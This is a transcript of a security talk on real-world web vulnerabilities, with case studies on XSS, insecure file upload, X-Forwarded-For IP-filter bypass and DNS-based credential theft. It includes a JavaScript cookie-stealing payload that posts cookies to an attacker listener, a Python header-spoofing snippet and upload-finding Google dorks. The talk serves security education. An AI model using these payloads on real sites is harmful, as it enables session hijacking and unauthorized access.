Presentation is loading. Please wait.

Presentation is loading. Please wait.

IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world.

Published byMatilda Carter Modified over 9 years ago

Similar presentations

Presentation on theme: "IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world."— Presentation transcript:

1 IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world

2 IDAsec copyright - all rights reserved2 About me @Linkedin – Itzik Moshe Security Researcher Co-Founder & CEO of IDAsec Lecturer - See-Security College

3 IDAsec copyright - all rights reserved3 Known terms XSS SQLi CSRF Bla bla bla...

4 IDAsec copyright - all rights reserved4 Study Case #1 - XSS Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. For more details on the different types of XSS flaws

5 IDAsec copyright - all rights reserved5 Example

6 IDAsec copyright - all rights reserved6 Example

7 IDAsec copyright - all rights reserved7 Study Case #1 – XSS Admin Panel Server Website Server No Connection between Main site & Admin panel Temporary DB / Synchronized DB

8 IDAsec copyright - all rights reserved8 Contact Us

9 IDAsec copyright - all rights reserved9 Study Case #1 - XSS var c = document.cookie; var u = document.URL; xmlhttp.open("POST","myserver/listener",true); xmlhttp.send("cookie=” + c + ”&url=" + u);

10 IDAsec copyright - all rights reserved10 Server Side Cookie: "PHPSESSID=56669e7e1e131dc965ad8e9adc 7501e0" Url: Victimaddress.com

11 IDAsec copyright - all rights reserved11 Inject the Cookie

12 IDAsec copyright - all rights reserved12 Study Case #2 – Insecure Upload Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step. The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, and simple defacement. It depends on what the application does with the uploaded file and especially where it is stored. There are really two classes of problems here. The first is with the file metadata, like the path and file name. These are generally provided by the transport, such as HTTP multi-part encoding. This data may trick the application into overwriting a critical file or storing the file in a bad location. You must validate the metadata extremely carefully before using it. The other class of problem is with the file size or content. The range of problems here depends entirely on what the file is used for. See the examples below for some ideas about how files might be misused. To protect against this type of attack, you should analyze everything your application does with files and think carefully about what processing and interpreters are involved

13 IDAsec copyright - all rights reserved13 Study Case #2 – Insecure Upload Main Local Server + Temporary DB Off-line Server + main DB Website(3rd party)

14 IDAsec copyright - all rights reserved14 Some Google dorking... Site:victim.com intext:upload Site:victim.com inurl:upload Site:victim.com intext:upload https://www.exploit-db.com/google-hacking-database

15 IDAsec copyright - all rights reserved15 Phishing

16 IDAsec copyright - all rights reserved16 Study Case #2 – Insecure Upload Reverse connection within 3mins Inside VPN IT Manager Turned off the entire company after 2 hours White night(ops...)

17 IDAsec copyright - all rights reserved17 Study Case #3 – Dumb Mistakes

18 IDAsec copyright - all rights reserved18 Study Case #3 – Dumb Mistakes HTTP Header IP Filter X-Forwarded-For

19 IDAsec copyright - all rights reserved19 Study Case #3 – Dumb Mistakes Login.php~ List of authorized IP address

20 IDAsec copyright - all rights reserved20 Injecting Header import urllib2,cookielib cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) opener.addheaders = [('HTTP_X_FORWARDED_FOR','1.2.3.4'),] resp=opener.open('http://example.com/logIP.php')

21 IDAsec copyright - all rights reserved21 Conclusions CHAEP OUTSOURCING != SECURITY

22 IDAsec copyright - all rights reserved22 Case Study #4 – Authentication

23 IDAsec copyright - all rights reserved23 Local Network DNS Manipulation Poison DNS response Attacker runs Local PHP Proxy Steal victim's credentials

24 IDAsec copyright - all rights reserved24 Example

25 IDAsec copyright - all rights reserved25 Solutions(sort of) Cookies Management Authentication Layers(Code) JavaScript / Ajax Solutions

26 IDAsec copyright - all rights reserved26 Questions?

Download ppt "IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.

Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
SEC835 OWASP Top Ten Project.

SEC835 OWASP Top Ten Project.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
Team Members: Brad Stancel,

Team Members: Brad Stancel,
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.

Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.
Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.

Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 

Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
OWASP Zed Attack Proxy Project Lead

OWASP Zed Attack Proxy Project Lead

Similar presentations

Ads by Google